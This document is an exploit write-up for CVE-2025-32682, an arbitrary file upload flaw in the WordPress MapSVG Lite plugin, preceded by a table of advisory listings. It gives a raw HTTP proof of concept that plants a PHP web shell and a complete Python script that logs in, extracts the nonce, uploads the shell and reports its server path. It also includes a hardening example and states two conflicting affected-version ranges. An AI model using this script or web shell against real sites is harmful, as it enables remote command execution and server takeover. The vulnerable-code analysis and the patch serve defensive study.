| Title | Published | Views | Family |
|---|---|---|---|
| Exploit for CVE-2025-32682 | 18 Apr 2025 10:18 | – | githubexploit |
| CVE-2025-32682 | 17 Apr 2025 16:48 | – | circl |
| WordPress plugin MapSVG Lite code issue vulnerability | 17 Apr 2025 00:00 | – | cnnvd |
| CVE-2025-32682 | 17 Apr 2025 15:46 | – | cve |
| CVE-2025-32682 WordPress MapSVG Lite plugin <= 8.6.4 - Arbitrary File Upload Vulnerability | 17 Apr 2025 15:46 | – | cvelist |
| EUVD-2025-11734 | 3 Oct 2025 20:07 | – | euvd |
| CVE-2025-32682 | 17 Apr 2025 16:15 | – | nvd |
| WordPress MapSVG Lite plugin <= 8.6.4 - Arbitrary File Upload Vulnerability | 15 Apr 2025 17:03 | – | patchstack |
| PT-2025-17168 · Unknown · Mapsvg Lite | 17 Apr 2025 00:00 | – | ptsecurity |
| CVE-2025-32682 | 25 Apr 2025 17:33 | – | redhatcve |
# 🐚 CVE-2025-32682 - Arbitrary File Upload in MapSVG Lite <= 8.5.34
## 📌 Plugin Details
- **Name:** MapSVG Lite
- **Affected Version:** <= 8.5.34
- **Vulnerability Type:** Arbitrary File Upload
- **CVE ID:** CVE-2025-32682
- **Published Date:** 15 April, 2025
- **CVSS Score:** 9.9 (Critical)
---
## 💥 Vulnerability Summary
The `MapSVG Lite` plugin for WordPress does not validate file types when uploading SVG files via its REST API endpoint:
```
/wp-json/mapsvg/v1/svgfile
```
This allows an authenticated attacker (Subscriber+) to upload arbitrary PHP files disguised as SVG, resulting in remote code execution (RCE).
---
## 📎 Proof of Concept (POC) - Raw HTTP Request
```http
POST /wp-json/mapsvg/v1/svgfile HTTP/1.1
Host: 192.168.100.74:888
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://target.com/wp-admin/admin.php?page=mapsvg-config
X-WP-Nonce: 4febb3ff50
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------155355665422604566641836454807
Content-Length: 298
Origin: http://192.168.100.74:888
Connection: keep-alive
Cookie:

-----------------------------155355665422604566641836454807
Content-Disposition: form-data; name="file"; filename="nxploit.php"
Content-Type: text/xml

<?php
if(isset($_GET['cmd'])) {
    system($_GET['cmd']);
}
?>
-----------------------------155355665422604566641836454807--
```
### 🔍 Vulnerable Code Snippet
The following vulnerable code snippet from the `mapsvg-lite-interactive-vector-maps.php` file highlights the issue:
```php
public function uploadSVG() {
    // The raw $_FILES entry is used as-is: no extension, MIME type or content check.
    $file = $_FILES['file'];
    // wp_upload_bits() writes the bytes under wp-content/uploads using the
    // client-supplied file name, so a name ending in .php lands on disk unchanged.
    $upload = wp_upload_bits($file['name'], null, file_get_contents($file['tmp_name']));
    return new \WP_REST_Response(["file" => $upload], 200);
}
```
- ❌ **No filetype check**
- ❌ **No extension validation**
- ❌ **No sanitization of file contents**
This function is directly mapped to the REST endpoint `/wp-json/mapsvg/v1/svgfile`.
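The missing checks above, as an added hardening example that is not the plugin's own code: a drop-in replacement for the `uploadSVG()` callback that requires the `upload_files` capability, allows only the `.svg` extension, rejects PHP tags and script content, verifies the file parses as XML with an `<svg>` root, and forces a sanitized `.svg` name on disk. It assumes WordPress core is loaded, that the route keeps an authenticating `permission_callback`, and that the plugin already registers `image/svg+xml` through the `upload_mimes` filter (otherwise `wp_upload_bits()` refuses `.svg` names).

```php
// Added example, not the plugin's code. Assumes WordPress core is loaded and
// that image/svg+xml is already allowed via the upload_mimes filter.
public function uploadSVG( \WP_REST_Request $request ) {
    // Subscribers cannot upload media elsewhere in WordPress; require the same capability here.
    if ( ! current_user_can( 'upload_files' ) ) {
        return new \WP_Error( 'mapsvg_forbidden', 'Insufficient permissions.', [ 'status' => 403 ] );
    }

    $files = $request->get_file_params();
    if ( empty( $files['file']['tmp_name'] ) || ! is_uploaded_file( $files['file']['tmp_name'] ) ) {
        return new \WP_Error( 'mapsvg_no_file', 'No file was uploaded.', [ 'status' => 400 ] );
    }
    $file = $files['file'];

    // Extension allowlist on the client-supplied name: only .svg is acceptable.
    if ( 'svg' !== strtolower( pathinfo( $file['name'], PATHINFO_EXTENSION ) ) ) {
        return new \WP_Error( 'mapsvg_bad_ext', 'Only .svg files are accepted.', [ 'status' => 415 ] );
    }

    // Content check: reject PHP open tags (anything "<?" other than the XML declaration),
    // inline <script> and event-handler attributes before the bytes reach the web root.
    $contents = file_get_contents( $file['tmp_name'] );
    if ( false === $contents || preg_match( '/<\?(?!xml\b)|<script\b|\bon\w+\s*=/i', $contents ) ) {
        return new \WP_Error( 'mapsvg_bad_content', 'SVG content rejected.', [ 'status' => 415 ] );
    }

    // Structural check: the file must parse as XML with an <svg> root element.
    // LIBXML_NONET blocks network fetches; LIBXML_NOENT is deliberately not set.
    $prev = libxml_use_internal_errors( true );
    $doc  = simplexml_load_string( $contents, 'SimpleXMLElement', LIBXML_NONET );
    libxml_use_internal_errors( $prev );
    if ( false === $doc || 'svg' !== $doc->getName() ) {
        return new \WP_Error( 'mapsvg_not_svg', 'Not an SVG document.', [ 'status' => 415 ] );
    }

    // Store under a sanitized base name with a forced .svg extension, so the name
    // on disk can never carry an executable extension whatever the input was.
    $base   = sanitize_file_name( pathinfo( $file['name'], PATHINFO_FILENAME ) );
    $name   = ( '' !== $base ? $base : 'map' ) . '.svg';
    $upload = wp_upload_bits( $name, null, $contents );
    if ( ! empty( $upload['error'] ) ) {
        return new \WP_Error( 'mapsvg_upload_failed', $upload['error'], [ 'status' => 500 ] );
    }
    return new \WP_REST_Response( [ 'file' => $upload ], 200 );
}
```

The capability check belongs in the route's `permission_callback` as well, so unauthorized requests are refused before any file is read.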
---
## 🧠 Exploitation Requirements
- ✅ Requires authentication (Subscriber+)
- 🛑 No filetype or content validation
---
## 🐍 POC 2 - Python Exploit Script
```python
# By: Nxploited | Khaled Alenazi
import requests
import argparse
import re

requests.packages.urllib3.disable_warnings()
session = requests.Session()
session.verify = False
user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"

parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", required=True)
parser.add_argument("-un", "--username", required=True)
parser.add_argument("-p", "--password", required=True)
args = parser.parse_args()

login_url = f"{args.url}/wp-login.php"
resp = session.post(login_url, data={
    'log': args.username,
    'pwd': args.password,
    'rememberme': 'forever',
    'wp-submit': 'Log In'
}, headers={"User-Agent": user_agent})
if 'wordpress_logged_in' not in str(session.cookies):
    print("[-] Login failed")
    exit()
print("[+] Logged in successfully.")

nonce_page = session.get(f"{args.url}/wp-admin/admin.php?page=mapsvg-config")
match = re.search(r'"nonce":"([a-f0-9]+)"', nonce_page.text)
if not match:
    print("[-] Failed to extract nonce")
    exit()
nonce = match.group(1)
print(f"[+] Found nonce: {nonce}")

upload_url = f"{args.url}/wp-json/mapsvg/v1/svgfile"
print(f"[+] Uploading file to: {upload_url}")
payload = {'file': ('nxploit.php', '<?php if(isset($_GET[\'cmd\'])){ system($_GET[\'cmd\']); } ?>', 'application/x-php')}
headers = {
    'X-WP-Nonce': nonce,
    'Referer': f"{args.url}/wp-admin/admin.php?page=mapsvg-config",
    'X-Requested-With': 'XMLHttpRequest',
    'User-Agent': user_agent
}
res = session.post(upload_url, files=payload, headers=headers)
try:
    json_res = res.json()
    print("[+] Server response (formatted):")
    print("File Name :", json_res['file']['name'])
    print("URL :", json_res['file']['relativeUrl'])
    print("Path Short :", json_res['file']['pathShort'])
    print("Server Path :", json_res['file']['serverPath'])
    print("\nExploited By : Nxploited | Khaled Alenazi")
except (ValueError, KeyError, TypeError):
    print("[-] Upload failed or invalid response.")
```
---
## ☠️ Impact
Exploitation of this vulnerability allows an attacker to upload a `.php` web shell to the `/wp-content/uploads/mapsvg/` directory and execute arbitrary commands on the server.
---
## 👤 By:
**Nxploited | Khaled Alenazi**
---
## ⚠️ Disclaimer
This project is for **educational purposes only**. Unauthorized access to systems without permission is illegal.